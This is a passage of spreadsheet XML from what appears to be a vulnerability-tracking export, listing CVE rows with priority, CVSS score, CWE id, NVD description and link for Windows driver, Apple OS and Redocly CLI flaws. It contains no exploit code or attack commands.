          <t>Redocly CLI makes OpenAPI validation, linting, and documentation workflows easier. Prior to version 2.33.0 of @redocly/respect-core and @redocly/cli, the respect command dynamically evaluates $faker runtime expressions in Arazzo descriptions. A crafted expression can traverse constructor, prototype, or __proto__ properties in packages/respect-core/src/modules/context-parser/get-value-from-context.ts, reach the JavaScript Function constructor, and execute arbitrary code when a user processes an untrusted description. The executed code runs with the privileges of the CLI process and can execute shell commands or read CI secrets. Users processing only trusted, self-authored workflows are not affected. This issue is fixed in @redocly/respect-core and @redocly/cli version 2.33.0.</t>
        </is>
      </c>
      <c r="S437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63325</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64790</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr"/>
      <c r="Q438" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>A path handling issue was addressed with improved validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to gain elevated privileges.</t>
        </is>
      </c>
      <c r="S438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64790</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65344</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr"/>
      <c r="Q439" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27. Processing a maliciously crafted video file may lead to unexpected app termination.</t>
        </is>
      </c>
      <c r="S439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65344</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K440"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440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr"/>
      <c r="Q440" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K441"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441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr"/>
      <c r="Q441" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K442"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442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr"/>
      <c r="Q442" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K443"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443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr"/>
      <c r="Q443" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K444"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444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr"/>
      <c r="Q444" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K445"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445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr"/>
      <c r="Q445" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K446"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446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr"/>
      <c r="Q446" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K447" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr"/>
      <c r="Q447" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K448"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448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr"/>
      <c r="Q448" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K449"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449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr"/>
      <c r="Q449" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69864</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr"/>
      <c r="Q450" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K451" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr"/>
      <c r="Q451" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K452"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452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr"/>
      <c r="Q452" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K453" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr"/>
      <c r="Q453" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K454"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454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr"/>
      <c r="Q454" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
